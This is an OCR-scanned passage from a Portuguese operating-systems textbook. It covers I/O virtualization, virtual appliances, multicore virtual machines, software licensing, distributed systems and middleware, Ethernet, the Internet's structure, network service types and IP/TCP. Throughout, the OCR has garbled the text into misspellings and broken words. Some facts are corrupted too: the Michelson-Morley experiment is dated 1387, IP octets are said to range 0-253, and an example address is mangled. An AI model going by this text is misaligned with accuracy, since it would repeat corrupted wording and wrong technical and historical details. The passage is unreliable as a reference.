rios ao funcionamento dos dispositivos e lenta uliliza-los* 
Quando os drivcrs ten ta rem ex ecu tar operaęoes de E/S, 
eles realiza ra o operaęocs dc lei tura e escrita nos registros 
de hardware equivalentes. Essas instmędes sao sensivcis e 
serao capturadas para o hipervlsor que, por sua vez, podera 
copiar os valores nccessai ios dos registros de hardware on 
escreve-los la, eon formę o neccssario* 

Mas ainda assim temos um problema. Cada sistema 
operaeional hóspede imagina dispor de uma partięao de 
disco inteira, e o nu mer o de tnaquinas viriuais existentes 
(centenas) pode ser maior do qtie o dc partięóes dtspom- 
vcis. A soluęao mais comum e fazer com que o hipervtsor 
crlc um arquivo on selccione uma regiao do disco rcal para 
associar a uma maąuina vinual. Como o SO hóspede tema 
conlrolar um disco que pertenee ao hardware rcal (e quc 
6 compreendido pelo hipmisor), cle pode convertcr o nti- 
mero do bioco sendo accssado em um deslocamento no 
arquivo ou no cspaęo do disco sendo utilizado para arma- 
zenamemo e operaęoes de E/S. 

Tam bem ć possivel que o disco em tiso pelo sistema 
operadonal hóspede seja difereme do disco rcal Por exem- 
plo, sc o disco rcal for algom novo disco de a!La performan¬ 
ce {ou RAID) que acabou dc ser lanęado com uma nova in- 
tcrface, o hipervisor poderia comunicar ao 50 hóspede que 
de dispoe de um antigo disco IDE e ddxar que ele insta- 
lasse o driver correspondente. Quando esse driver enviasse 
comandos de disco IDE, o hipcrvisor faiia a tonversao des- 
ses comandos em outros equivalentes ao novo disco. Essa 
estrategia pode ser utilizada na atualizaęao do hardware 
sem necessidade de modificaęao de software. Na verdade, 
essa capacidade de a maquina virtual remapear dispositivos 
de hardware foi uma das razoes para que o YM/370 se lor- 
nasse popular: as empresas queriam adąuirir equipamen- 
tos novos e mais rapidos sem ter de modificar sen software. 
A te etiologia de maquina virmal toni o u isso possfvd. 

Outro problema de E/S que precisa ser resolvido e o 
tiso de DMA, que utiliza endereęos de memória absolu- 
tos. Como e de se esperar, o hipervisor precisa intervir 
e remapear os endereęos a mes que o DMA inicie. En- 
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tretamo, o hardware comeęa a ser lanęado com MMU 
E/S, que yirtualiza a E/S da mesma maneira que o MMU 
yirtualiza a memória. Esse lipo de hardware elimina o 
probiema dc DMA. 

Tambem e po$$fvel gerenciar E/S reservando urna; das 
maąuinas yirtuais a execuęao do sistema operacional pa- 
drao e dłrecionando para ela lodas as chamadas de E/S. 
Essa abordagem apresenta mellior desempenho quando se 
nsa paravirtualizaęao, pois o comando enviado ao hiper- 
visor realnienie informa o qne o SO hóspede deseja (por 
exemplo, ler o bloco 1403 do disco 1), cm vez dc gerar unia 
serie dc comandos que escreyem cm registms dc disposi- 
tivos. Nessc ultimo caso, o hipemsor prccisa atuar como 
urna cspedc dc Shcrlock Holmes, dcscobrindo o quc o sis- 
tema esta lentando rcalizar O Xeii utiliza cssa abordagem 
no gerenciamenio de E/S, e a maąuina yirtual responsavel 
pela E/S e denominada dominio 0. 

A virtua!izaęao dc E/S e uma area na quai os hipervi- 
sores tipo 2 apresentam uma yantagem pratica cm relaęao 
aos hipcrvisorcs lipo 1: o sistema operacional hospcdciro 
contem os drivcrs para todos os lipos dc dispositivos — 
dos mais estranhos aos mais extraordinarios ł Quando um 
pi ogrania aplicativo lenia acessar um dispositivo de E/S 
pouco comum, o código traduzido pode recorrer ao driver 
correspondente para que o trabalho seja executado. Com 
um hipervisor tipo U e necessario que o próprio hipervi- 
sor contenha o driver ou que ele rcalize uma chamada ao 
driver no dominio 0 — que e um tanto semelhanie a um 
sistema operacional hospcdciro. Com o amadurccimento 
da tecnologia dc maąuina yirtual, e possivcl que os fu- 
tu ras eąuipamentos permitnm quc os programas aplica- 
tivos acessem o hardware diretamente de modo seguro, 
o quc significa quc os drivers de dispositiyos podem ficar 
diretamente ligados ao código de aplicaęao ou podem ser 
armazenados em servidores de modo usuario separados, 
eliminando o probiema. 

_ 83,71 Ferramentas yirtuais 

As maąuinas yirtuais oferecem urna soluęao interes- 
sanie para um probiema que ha muilo persegue os usua- 
rios, em especial os usuarios de software de código aberto: 
como insiatar novos programas ap!icativos. O probiema e 
que muiLas aplicaęocs dcpendcm de varias on tras apliea- 
ęoes e biblioleeas quc tambem depcndcin dc um hospedei- 
ro dc ouiros pacoies de software etc. Alerti disso, podem 
existir dependenctas dc versoes particuiares dc compilado- 
res, Jinguagcns de scripi c sistemas opcracionals. 

Com as maąuinas yirtuais amalmenie dispomyeis, um 
desenvolvedor dc software pode construir ciiidadosamcnte 
uma maąuina yirtual, carrcga-la com o sistema operacio¬ 
nal os compiladorcs, as biblioleeas c os códigos dc aplica- 
ęcio ncccssarios c congdar toda a unidadc, agora pronta 
para o uso. Essa imagem da maąuina viriual pode, cm a o, 
ser cclocada cm um CD-ROM ou em um sile da Web para 
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que os clientes a copiem e mstalem. Essa abordagem stg- 
nifica que somente o desenvolvedor do software predsa 
compreender todas as dependencias. Os clientes obtem um 
pacoie compieto que realnienie funciona completamente 
independente do sistema operacional cm fundonamento 
e dos ouiros programas, pacoies e biblioleeas. Essas ma- 
quinas virluais empacotadas' costumam ser chamadas de 
aplicaęoes yirtuais. 

_ 8.3.81 Maąuinas virtuais em CPUs 

multimkleo 

A combinaęao de maąuinas virtuais e CPUs multinu- 
deo abre um mundo totalmcnte novo, no qtial o numero 
de CPUs dispomyeis pode ser definido pdo software. Se 
exisiem, di gam os, quatro mi de os e ca da um dcl es pode 
execuiar, por exempIo, a te oito maąuinas virtuais, uma 
linica CPU pode ser configu rada para fimdonar como um 
multicomputador de 32 nós caso seja necessario, mas lam- 
bem pode ter menos CPUs, dependendo da necessidade 
do software. Nunca antes foi possrvel que os projelistas da 
aplicaęao decidissem ąuantas CPUs desejavam para, entao, 
escrever o software para tal Esta e cl ara men te uma nova 
fasę na compmaęao- 

Embora aind a na o seja muito cornum, certa meme ć 
concebieel que as maąuinas virtuais compariilhem memó¬ 
ria, Basta que sejam mapendas as paginas fisi ca s nos es- 
paęos de endereęamento yirtuais das diferentes maąuinas 
viriuais. Se isso forpossivel, um linko computador se torna 
um multiproccssador virtual. Como todos os nudeos cm urn 
chip multinucleo compartilham a mesma RAM, um chip 
com ąuatro nudeos poderia facilmenie ser configurado 
como um muiiiproccssador ou um multicomputador de 32 
nós, eon formę a necessidade. 

A eombinaęao dc muitinucleos, maąuinas yirtuais, 
hlpcrvisorcs c micronudeos afetara radicaJmcnte a forma 
como as pessoas veem os sistemas computadonais. O eon- 
junto atual dc software ainda nao conscguc lidar com a 
possibilidade de o program ad o r deddir ąuamas CPUs sao 
necessarias, se das devem ser eon figura das como um mul- 
ticompuiador ou um multiproccssador c ąuantos c ąuais 
lipos de nudeos sao necessarios, Novos programas prccisa- 
rao estar preparados para essas ąuestoes 

83,91 Problemas de licenciamenło 

A maior parte do software ć liceticiada para uso em 
uma CPU. Em outras palavras, quando se compra um 
programa, adquire-se o direito de exeeuta-k> em somente 
um computador. O com rato permite o funciona men to em 
mii kipią s maąuinas yirtuais que funcionem em uma mes¬ 
ma maąuina ffsica? Muitos vendedores nao sabem o que 
responder nessa situaęao. 

O probiema e muilo piór cm empresas que possuem 
uma licenęa que permite o fundonamento do software em 
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n maąuinas ao mesmo tempo, em especial ąuartdo a de- 
manda por ma q u i nas virluais osciła. 

Hm alguns ca sos, os vendcdores dc software criam 
urna dausula explfciia no contralo que profbe a execuęao 
do pragrama ern maąuinas virtuaLs on em maąuinas virtuais 
nao amonza das. Ainda nao ha relatos sobre como essas 
restrięoes seriam vistas por um Iribunal de justięa ou sobre 
como os u su a ri os respondem a elas. 



Sistemas distribuidos 


Tendo agora completado hosso estudo sobre mul ii- 
processadores, multicomputadores e maąuinas virtuais, 
esta na hora de conhecer o lerceiro tipo de sistenia com 
miiltiplos proce ssadores, os sistemas distribuidos. Esses 
sistemas sao similares aos multicomputadores pelo lato dc 
cada nó ter sua própria memória privada, sem ncnłiuma 
memória ffsica compartilhada no sistema. Gontu do, os sis¬ 
temas distribuidos ainda sao mais fracamente acoplados do 
que os multicomputadores. 

Para comeęar, os nos dc um multicompiitador em geral 
tern urna CPU, RAM, unia imcrface de rede e talvez um 
disco rigido para paginaęao, Em contrastc, cada nó em um 
sistema distribufdo e um computador completo, com todos 
os pcrifericos* Alem disso, os nos de um multicompiitador 
normalnienie estao em urna linica sala, de modo que des 
podem se comunicar por me i o de u ma rede dedicada de aha 
vdocidade, ao passo que os nos de um sistema distribufdo 
podem estar espalhados ao redor do mu udo. Por firn, todos 
os nós de um multicompiitador executam o mesmo siste¬ 
nia opcracional, compartilham o mesmo sistema de arqui- 
vos e estao sujettos a um gerendamento cornuni, enąuanto 
os nós dc um sistema distribufdo podem executar sistemas 
operacionais diferentes, ter scus próprios sistemas dc arqui- 
vos e estar sujeitos a gerenciamentos diferentes. Um cxem- 
plo tipico de um multicompiitador contem 512 nós em urna 
Linka sala em urna empresa ou universidade trabalhando 
com, digamos, modelagem farmaceuiica, enąuanto urn sis- 
tema distribuf-do tfpico consiste em milhares de maąuinas 
cooperando dc modo fracamcnte acoplado pola Internet A 


Tabela 8.1 compara multiprocessadores, multicomputado- 
res e sistemas dislribufdos segundo o ponto de vista ante- 
rionnente mencionado. 

Usando essas mciricas, os multicomputadores estao 
nitidamente no meio, Surge urna ąuestao interessante: 
Os multicomputadores sao mais pa recki os com mu U i pro - 
cessadorcs ou com sistemas distribuidos? Por incrivd que 
paręęa, a resposta depende minio do ponto de vista, Tec- 
nicamente, os multiprocessadores tern memória comparti¬ 
lhada e os outros dois, nao. Essa diferenęa leva a model os 
dc progiamaęao c coujuntos dc opinioes divcrsos. Gontu - 
do, do ponto dc vista das aplicaęóes, multiprocessadores 
c multicomputadores sao apenas grandes racks com equi- 
pamentos em urna sala de maąuinas, Aiiibos sao usados 
para resolver problemas computacionalmente intcnsivos, 
enąuanto um sistema distribuido que conecte todos os 
computadores pda internet geral nieme 6 muito mais en- 
volvido em comunicaęao do que em computaęao, sendo 
empregado de modo dilerem e. 

De certa maneira, o acoplamemo fraco dos computa- 
dores em um sistema distribufdo e, ao mesmo tempo, urna 
vantagem e urna desvantagem. E unia vantagem porque os 
computadores podem ser usados por uma ampla variedade 
de apHcaęoes, mas e lambem uma desvantagem, pois a pro- 
gramaęao dessas aplicaęoes e diffdl em razao da falta de 
qualquer modelo de uma plataforma cornuni, 

Aplicaęoes tfpicas da Internet induem acesso a com- 
pmadores remotos (usando telnet ssh e rfojjm), acesso a in- 
formaęao remota (usando a WWW — worki wide web — e 
FTP — file transfer pfotoml — protocolo de transferenda de 
arquivos), comunicaęao pessoa a pessoa (por meio de e- 
-mail e programas de bate-papo) e muitas aplicaęoes mais 
recemes (por exemplo, cometcio eleironico, idemedicina 
e ensino a distanda). A preocupaęao com todas essas apli- 
caędes e que cada uma delas tema reinvemar a roda. Por 
exemplo, tantoe-mail FTP ou WWWbasicamente movem 
arquivos do ponto A para o ponto B t mas cada um a seu 
próprio modo e com sua própria convenęao de no mes, pro- 
toeolos de transferenda, teenicas de replicaęao etc. Embora 
muitos navegadores de Internet escondam essas diferenęas 


Item 

Multiprocessador 

Mtilti computador 

Sistema distribuido 

Configu raęao do nó 

CPU 

CPU. RAM, interface de rede 

Computador com pieto 

Perifóricos do nó 

Tudo compartilhada 

Exc. compartilhada, talvez disco 

Conjunto completo por nó 

Locaiizaęao 

Mesmo rack 

Mesma sala 

Possivelmente espaihado pelo mundo 

Comunicaęao entre nós 

RAM compartilhada 

lnterconexao dedicada 

Rede trądicional 

Sistemas operacionais 

Um, compartilhada 

Multipios. mesmo 

Possivelmente todos diferentes 

Sistemas de arqufvos 

Um, compariilhado 

Um, compartilhado 

Cada nó tern seu próprio 

Administ raęao 

Uma organizaęao 

Uma organizaęao 

Varias organizaęoes 


I Tabela 8,1 Comparaęao de tres tipos de sistemas com móltiplas CPUs. 
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do u su ano comum, os mecanismos subjacences sao com- 
pletamente diferentes. Esconde-las no nivel da interface 
do usuario e o mesmo que urna pessoa, em uma pagina 
da Web de uma agenda de viagem com servięo comple- 
to, agendar uma viagem de Nova York para Sao Frandsco 
e soniente depois descobrir se adąuiriu urna passagem de 
aviao, trem ou onibus. 

O que os sistemas disiribuidos acrescentam a rede de 
comunicaęao subjacente ć um certo paradigma comum 
(niodelo) que fornece uma maneira uniform? de ver o sis¬ 
tema como um todo. A intenęao do sistema distribiudo c 
transformar um grupo dc iuaqumas fracamcnte conecta- 
das cm um sistema coerente com basc em um conceito. 
Algumas vczes o paradigma e simpks; o ul ras, 6 inais elabora- 
do, mas a idcia e sempre fornecer algo que unifiąue o sistema. 

Um exemplo simples de um paradigma unificador cm 
um coniextoligeiramenie difereme e encontrado no UNIX, 
em que todos os dispositivos de El S sio fotos de modo a se 
parecerem com arquivos. Ter placas, impressoras e linhas 
seriais, todas operami o da mesma maneira, com as mesmas 
primiiwas, torna mais fadl manipula-las do que ąuando 
elas sao conceitualrnenie diferemes. 

Algo que permite ao sistema distribiudo conseguir uni- 
formidadc na presenęa de diferentes hardwares e sistemas 
operacionais 6 ter uma ca mada dc software no topo do sis¬ 
tema opera cional. Essa ca mada, chamada dc middleware, 
e ilustrada na Figura 8.29. Ela ofercce ccrtas estru tu ras de 
dados e operaęoes que permitem que processos e usuarios 
em maquinas distantes se relacioneni em grupo de um 
modo consistente. 

De certa maneira, o middleware se parccc com o sis¬ 
tema operadonal de um sistema distribiudo e por esse 
moli v o esta sen do disculido em um llvro sobie sistemas 
operacionais, For outro lado, naoeuni sistema operacional 
de modo que essa discussao nao prosseguira em mais de- 
talhes. Para um emendimeruo mais compieto dos sistemas 
distribindos, veja o hvro Distnbuied Systems (Tanenbaum e 


Van Steen, 2002). No restante deste capftulo, abordaremos 
de passagem o hardware usaiio em um sistema distribiudo 
(isto e, a rede de computadores subjacente) e depois nos 
deteremos em seu software dc comunicaęao {isto e P pro- 
tocolos de rede), Por firn, tcccrcmos considcraędcs sobrc 
varios paradigmas empregados nesses sistemas, 

8.4.11 Hardware de rede 

Os sistemas disiribuidos sao construidos sobre as redes 
de computadores; portamo, uma brevc introduęao a esse 
assimto se faz neccssaria. As redes existcm em duas classes 
principais, as LANs (łocalarea mtworks — redes locais), que 
abrangem um ediffdo ou um campus, c as WANs {widearea 
mtworks — redes dc longa disiancia), quc podcm abraiiger 
cidades, pafses ou mesmo o planeta inteiro. O mais impor- 
tame lipo dc LAN e a Ethernet e, por isso, vamos examina- 
-la como um exemp)o de LAN. Como amosiragem de uma 
WAN, veremosa Internet — embora tecnicamenle nao seja 
uma rede, mas sim uma federaęao de milhares de redes 
separadas. Com udo, para nossos propositos, e su fi cienie 
cntcndć-la como uma WAN. 

Ethernet 

A Ethernet dassica, desenia no padrao 1EHE 802,3, 
consiste em um ca bo coaxial ao qual varios computadores 
sao conectados. O cabo e cha mad o de Ethernet, em re¬ 
ferenda a o eter luminoso (lummiferous etker) f por meio do 
qual sc imaginava quc a radiaęao magnetica pud esse se 
propagar. (Quando, no sćculo XIX, o lisico britanico Ja¬ 
mes Clerk Maxvvdl dcscobriu quc a radlaęao detromag- 
netica podia ser descrita por uma eąuaęao de onda, os 
dendsias condufram que o espaęo deveria ser constiluido 
por algum elemento etereo no qual a radiaęao pudesse 
se propagar. Somente após o famoso experimenio de Mi- 
chelson-Morley em 1387, o qual faihou ao experimentar 
o eter, os fisi cos p erce b era ni que a radiaęao poderia se 
propagar no vaaio.) 



I Figura 8.29 Posicionamento do middleware em um sistema distribuido. 
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Na primeira versao da Ethernet, um compuiador era 
ligado a um cabo pela abertura de um bu raco ate o meio 
deste cabo, que era usado para atarrancar um fi o que a 
ligava ao compuiador. Essc lipo de concctor fol chamado 
de conector vampiro (vampiretap), como moslra sitnboli- 
camente a Figura 8,30(a), Era diffcil conseguir furar corre- 
tamcnte e r assini, cm pouco tempo, coneaorcs adeąuados 
passa ram a ser empregados. Apesar disso, eletricamente, 
todos os computadores eram conectados como se os cabos 
cm suas placas de rede fossem soldados juntos. 

Para emdarum pacote por lima Ethernet, um computa- 
dor primeiro escuta o cabo para saber se algttm outro com- 
putador esta transmUrndo naquelc memento. Hm caso nc- 
gativo, ele simplesmente transmlte um pacote, quc consiste 
cm um pcąueno tabeęalho seguido dc 0 a 1,500 bytes de 
informaęao. Sc o cabo estivcr cm uso, o compuiador espera 
a transmissao aiual fmalizar para depois comeęar a enviar. 

Sc dois computadores comeęam a transmitir siuuilta- 
ncamente, ocorrc urna cołisao, dctectada por ambos. Os 
dois terminam a transniissao, esperando urna quantUbite 
de tempo alcatório cmrc 0 c T ps e cmao rdnidam nova- 
menie. Se mitra colisao oeorre, todos os computadores es- 
peram urna quantidadc de tempo akatorio entre 0 e 27"ps 
e depois centam novamerue. A cada nova colisao, o inter- 
valo maximo dc espera c duplicado, reduzindo as possihili- 
dades de mais colisoes. Esse algoritmo e chamado de recuo 
exponencial binario (bimry exponentialbackeft), anterior- 
mente abordado para reduzir a sobrecarga na espera por 
variaveis de travamemo. 

Urna Ethernet lem um comprimemo maximo dc cabo e 
tambem um numero maximo dc computadores que podem 
ser conectados a ele. Para ultrapassar quaiquer um desses 
limites, os ediffdos ou amipi grandes podem ser ligados a 
earias redes Ethernet, que sao, eniao, conectadas por dispo- 
sitivos cha mad os de pontes (bridges). Urna pontc pemiitc 
que o trafego passe de urna Ethernet para outra quando o 
remetente esta de um lado e o destinatario, do outro. 

Para evitar o problema das colisoes, as redes Ethernet 
moderna s u sam comutadores (switches), como m ostra a Fi¬ 


Computador^^ 

? ? ? ?; 

/\ 

Co n eeto r vampi ro Ethe rnet 

(a) 


gura 8.30(b). Cada comutador tein um numero de portas, 
as quais podem ser ligados computadores, redes Ethernet 
ou outros comutadores. Quando um pacote evita todas as 
colisoes de modo bem-sucedido e chega ao comutador, dc 
c armazenado cm um buffer c cnviado pda porta que da 
accsso a maąuina destinataria, Dando a cada compuiador 
sua própria porta, todas as colisoes podem ser diminadas, 
ao custo de comutador maiores, Se estrulurados de acordo, 
tambem e possfvel usar alguns computadores para a mesma 
porta. Na Figura 8.30(b), urna Ethernet classica com mulil- 
pios compuiador es conectados a um cabo por um eonecior 
vampiro esta co ne aa da a urna das portas do comutador. 

Internet 

A Internet desmvolveu-se a partu da ARPANET, urna 
rcde CKperimental dc com u raca o de pacotcs fundada pda 
Agenda de Projctos e Pesąuisas Avanęadas do Departamen- 
to de Defesa dos Estados Unidos. Ela surgiu cm dezembro de 
1969 com tres computadores na Califórma e um em Utah e 
foi projetada para ser unia rede altameme toterante a falhas, 
que cominttaria a transmitir o trafego militar mesmo no caso 
de ataques nucleares diretos em varias part es da rede, auto- 
maticamente desWando o trafego das maqumas atingidas. 

A ARPANET cresceu rap i da men te na decada de 1970, 
emolvendo, por firn, centenas de computadores. Depois, 
urna rede de pacotes via radio, uma rede via satelitę e 0- 
nalmente milhares de redes Ethernet lara m liga das a ela, 
levando a federaęao de redes que conhecemos lioje como 
fntemet. 

A ARPANET consisie em dois tipos de computadores: 
hospedeiros {kosts) e roteadores. Os hospedeiros sao PCs, 
lapiops, palmtops, servidorcs, computadores de grandę 
porte e outros computadores pertcnccnles a indiv/duos 
ou companhsas quc qucrem concctar-se a Internet. Os ro¬ 
teadores sao computadores dc comutaęao espedalizados, 
que aceitam pacotes de unia das niuitas linhas de emra- 
da e os ermam para seus destinos por uma das diversas 
linhas de salda, Um roteador e slmilar ao comutador da 
Figura S.30(b), mas tambem difere dele de um modo que 
nao nos interessa aqui. Os roteadores sao conectados jun- 



I Figura 8.30 (a) Etliernet classica. (b} Ethernet ulizando comutadores. 
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tos em grandes redes, em que cada roieador possui fios 
on fibras para muitos ouiros roteadores e hospedeiros. As 
redes de roteadores de altance nacional ou mundial sao 
operadas por companhias de telefones e pelos ISPs ( Inter¬ 
net scmce providers — provedorcs dc servięos da Internet) 
para seus dicntcs. 

A Figura S.31 mostra urna parte da Internet. No topo, 
temos um backbone (rede principai), normaInieme con- 
trolado por um opera do r de backbone. Ele consiste em um 
numero de roteadores conectados por fibras óticas de alta 
largura de banda, com conexocs para backbones controla- 
dos por outras companhias tclefónicas (compctidoras)* Em 
gerak ncnlnim hospcdciro conccta-sc dirctamcntc ao back- 
bonc, a nao ser maąuinas dc manutcnęao c dc tcstcs quc 
trabalham para a eompanhia telcfonica. 

Ligados aos roteadores do backbone, por meto de co- 
nexoes de fibras ólicas de media veloddade, estao as redes 
regbnais e os roteadores dos ISPs. Todas as redes Ethernet 
corporativas tern, cada urna, um rotcador e lodos des en- 
contram-se conectados aos roteadores dc uma rede regio- 
naL Os roteadores dos ISPs sao conectados a bancos de mo- 
dems usados por seus dicntcs, Dcssc modo, um hospcdciro 
na internet tern pdo menos um caminho — e muitas vezes 
muitos eaminhos — para chegar aos ouiros hospedeiros. 

Todo trafego na Internet e enviado na forma dc pa- 
cotcs. Cada paeote carrcga o endereęo dc scu destinatario 
dentro dc si, c esse endereęo e osado para o roteamento, 
Quando um paeote chega ao rotcador, esic cxtrai o ende¬ 
reęo do destinatario (parte deie) c compara-o com uma ta¬ 
bela para encomrar a linha de salda a qual o paeote deve 
ser eiwiado e r assim, determinar quai o próximo roieador. 
Esse procedimemo e repetido ate que os pacotes alcancem 
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o hospedeiro destinatario. As tabelas de roteamento sao 
aIta menie dmamieas c passam por alualizaędes conimuas 
ąuando os roteadores c as concxócs se rompem e sao reati- 
vados e ąuando as condięoes de trafego se altcram. 

8.4.21 Servięos e protocolos de rede 

Todas as redes dc eompufadorcs forncccm certos scrvi- 
ęos para seus usuarios {hospedeiros e processos), os quais 
das implementam por meio dc certas regras para a troca 
legalizada de mensagens. A seguir, daremos uma breve in- 
iroduęao a esses tópicos. 

Semcos de rede 

As redes de computadores fornecem servięos para os 
hospedeiros c processos que as estao u san do, O servięt> 
orientado a conexao e modę lado de modo similar ao sis- 
tema tdcfonico, Para falar com algucm, voee apanha o tc- 
lefone, disca o nu mero, fala e depois coloca no gancho- Da 
mesma mancii a, para usar um servięo dc rede orientado a 
conexao P o usuario do servięo primeira estabelece uma co- 
nexao, usa essa conexao e depois a libera. O aspecto essen- 
cial de unia conexao e que ela age como uma tubulacao: o 
emissor coloca objetos dc um lado c o receptor colcta-os do 
mitro na mesma ordem. 

Contrariamente, o servięo sem conexao e modelado 
de modo similar ao sistema postał. Cada mensagem (carta) 
carrcga o endereęo completo do destinatario e ć roteada pdo 
sistema de modo independente umas das outras. Normal- 
meme, ąuando duas mensagens sao enviadas para o mesmo 
destinatario, a primeira mensagem enviada sera a primeira 
a chegar. No emanto, existe a possibilidade de que esta se 



I Figura 8-31 Uma parte da internet. 
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airase, de modo que a segunda seja a primeira a diegar. Com 
um servięo orientado a conexao, isso e impossivel. 

Cada sendęo pode ser caracterizado por uma qitalidade 
de servięo< Alguns sao confiaveis por nunca perderem da- 
dos. Em gem i, um servięo confiavd e implememado com 
o receptor confirmando o recebimento de cada mensagem 
pelo env[o de um pacote de confirmaęao (acknowledge- 
men r packet) espedal para cert i Fica r o emissor de que seu 
pacote chegou. O processo de confirmaęao gera sobrecarga 
e atrasos, que sao nccessarios para detectar a perda de pa- 
cotes, mas tornam as coisas niais lentas. 

Urna situaęao tipica na qnal um servięo orientado a co- 
nexao confiavel e apropriado e a transferencia de arquivos. 
O proprietario do arquivo quer ter ceneza de que todos 
os bits cheguem corretamente e na mesma orderu em que 
foram eiwiados. Pouquissimos clientes da transferencia de 
arquivo$ prefeririam um servięo que algunias vezes emba- 
ralliasse on perdesse alguns bits, mesmo que de fosse mui- 
to mais rapido. 

Um serdęo confiavel orientado a conexao tein duas 
pequenas variaęoes: seąuendas de mensagens e fluxo de 
byt es (kyte streams). No primeira caso, os limites das men¬ 
sagens sao preservados. Quando duas mensagens de 1 KB 
sao enviadas, das chegam como duas mensagens distintas 
de I KB e nunca como uma u ni ca mensagem de 2 KB. No 
segundo caso, a conexao e simplesmente um fluxo de bytcs, 
sem divisao em mensagens. Quando 2 K bytcs chegam ao 
receptor, nao ba como dizer se des foram enviados como 
uma unica mensagem de 2 KB, duas mensagens de 1 KB o u 
2.048 mensagens de 1 byle. Se as paginas de um livro sao 
emdadas por uma rede a um tipógrafo como mensagens sę¬ 
pa radas, pode ser importame preservar os limites das men¬ 
sagens. Por outro lado, para um terminal conectado a um 
sistema remoto de tempo compartilhado, o computador só 
precisa de um fluxo de bytes do terminal para de. 

Para algumas aplicaęoes, os atrasos imroduzidos pdas 
confinnaęoes sao inaceiiaveis. O trafego de voz digitalizada 
e uma dessas apiicaęoes. E preferfvel aos usuarios de tele- 
fone ouvir um bil de rufdo em uma linha ou uma palavra 
alterada de vez em quando a introduzir um atraso pela es- 
pera da confirmaęao. 


Nem todas as apiicaęoes requerem conexoes. Por 
exempIo, para testar a rede, e necessaria apenas uma ma- 
neira de enviar um unico pacote que tenha uma aita pro- 
babilidade de chegada, mas nenhuma garamia. Um servięo 
nao confiavd (tsioć, sem confirmaęao) sem conexao miii- 
las vezes e cha mado de servięo datagrama — em ana¬ 
logia ao scrvięo de telegra ma —, o qual nao ofcrece uma 
confirmaęao ao emissor. 

Em ou tras situaęoes, a conveniencia de nao precisar 
estabdecer uma conexao para enviar uma mensagem au¬ 
ta c dcscjavd, mas a confiabilidade ć cssenciai. 0 servięo 
datagrama com confinnaęao pode ser utilizado para 
cssas apiicaęoes. E como cnviar uma cana rcgistrada e so- 
licitar um aviso de recebimento. Quando o aviso ret o ma, 
o emissor usta absolu La mente seguro de que a cana foi t ri- 
tregue para a parte pretendida c nao foi perdida a o longo 
do caminho. 

Ainda ha o servięo de solieitaęao-replica {mjuesk 
-reply semce). Nessc scrvięo, o emissor transmite um uni¬ 
co datagrama com uma solicitaęao; a replica centem a res- 
posta. Por cxemplo, uma pesquisa na biblioieca local per- 
guntando onde Uighur e ci ta do entra nessa categoria, A 
solicitaęao-replica normalmente e usada para im pieniem ar 
a comunicaęao no modelo dicme-servidor: o diente emite 
uma solicitaęao e o sen r idor responde. A Tabela 8.2 resume 
os tipos de servięos quc foram disoHidos aqui. 

Protocolos de redes 

Todas as redes tein regras altamenio esperializadas 
para que as mensagens possani ser eiwiadas e para que as 
respostas sejam retomadas aquelcs quc as ermaram. Por 
cxemplo, sob cert as ciramstaneias (como a transferencia de 
arquivos), quando uma mensagem e eiwiada de um reme- 
tentc para um destinatario, estc precisa cnviar uma confir¬ 
maęao dc volta indicando a rcccpęao corrcta da mensagem. 
Sob outras drcunstancias (por cxcmplo, telefonia digital), 
nao se espera nenhuma mensagem de confirmaęao. O con- 
junto de regras pdas quais os computadores espedfkos se 
conuinicam e chama do de protocolo. Existem muitos pro¬ 
tocolos, indu i udo protocolos do lipo roteador a roteador, 
hospeddro a hospedciro c outros. Para uma informaęao 


Orientado a conexao 


Sem conexao 


Sen/tęo 

Exemplo 

Fluxo de mensagens confia^el 

Sequ§ncia de paginas de um liwo 

Fluxo de bytes conflaveE 

Login remoto 

Conexao nao confiavel 

Voz digitalizada 

Datagrama nao confiśve! 

Pacotes de test© de rede 

Datagrama com confirmaęao 

Correio registrado 

Sol icitaęao-rep 1 ica 

ConsuEta a um banco de dados 


i Tabela 8.2 Seis tipos diferentes de servięos de rede. 
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mais eompleta sobre redes de compiuadores e seus protoco- 
los, veja o livro Redes de Compiuadores (Tanenbaum, 2003). 

Todas as redes modemas u sam aquilo que ć diamado 
dc pilha de protocolos para assentar protocolos diferen- 
tes no topo de um outro, Em cada camada sao iraiados 
assumos dilerem es. Por exemplo, na camada mais bai xa os 
protocolos defmem como especificar onde um pacote co- 
meęa e oside termina dentro de um fluxo de bits. Em unia 
camada superior, os protocolos tratam como direcionar os 
pacotes da origem ate o destino por meio de redes com- 
plcxas. E, cm unia camada ainda mais alta, garantem que 
todos os pacotes dc urna mensagem com muitiplos pacolcs 
dieguem sem erros c na ordcm corrcta. 

Visto que a maioria dos sistemas distribindos usa a In¬ 
ternet como base, os protocolos prindpais que esses siste¬ 
mas empregam sao os dois maiores protocolos da Internet: 
1P e TCP. O IP {Internet protocd — protocolo da Internet) e 
um protocolo basen do em datagrąma no qual um emissor 
injeta um datagrama dc 64 KB na rede c confia em sua 
dicgada. Nao cxistc nenii u ma ga ranna. Q datagrama pode 
ser fragmentado cm pacotcs menores enquanto cle trafega 
pda Internet Esses pacotcs viajam de modo independente, 
possivelmeme por rotas diferentes. Quando todos os pe- 
daęos di ega m ao destino, elas sao remomados na ordem 
correta e emregues ao receptor. 

Duas vcrsoes do IP estao atualmcnte em uso; a v4 c 
a v6, Por enąuanta a v4 ainda domina e, por isso, vamos 
descreve-)a aqui, mas o uso da v6 esta aumentando, Cada 
pacote v4 i nicią com um cabeęalho de 40 bytes eon ten- 
do um endereęo de origem de 32 bits e um endereęo de 
destino de 32 bits, entre outros campos. Esses campos sao 
chama dos de endereęos IP e fomiam a base do roteamen- 
to na Internet. Eles sao convendonalmente escritos como 
quatro conjimtos de niimeros decimais na faixa de 0-253 
separados por pornos, como 19231,231 *65* Quando um 
pacote diega ao roteador, este extrai o IP do destinatario e 
usa-o para direcionar o pacote. 

Visto que os datagramas do IP nao sao conlirmados, o 
IP sozinho nao e suficieme para manier u ma conumica- 


ęao confiavel na Internet. Para oferecer essa comunicaęao 
confiavel, outro protocolo, o TCP (trammission contro1 pro- 
tocoi —protocolo de controle de iransmissao), geraimente e 
usa do no topo do IR O TCP emprega o IP para fornecer fiu* 
xos orient a dos a conexao. Para utilizar o TCP, um proccsso 
primeiro estabelece urna concxao com um processo rerno- 
to. O processo que esta sen do requisitado e determinado 
pelo endereęo IP de sua maąuina e o mimem de urna porta 
por meio da qual ele podera escutar caso esteja interessado 
em receber conexoes. Depois que a conexao tiver sido feita, 
o processo local enviara bytes atraves dęła com a garamia 
de que chegarao do outro lado, na ordem correta e sem er¬ 
ros. A iinplementaęao do TCP oferece essa garamia usando 
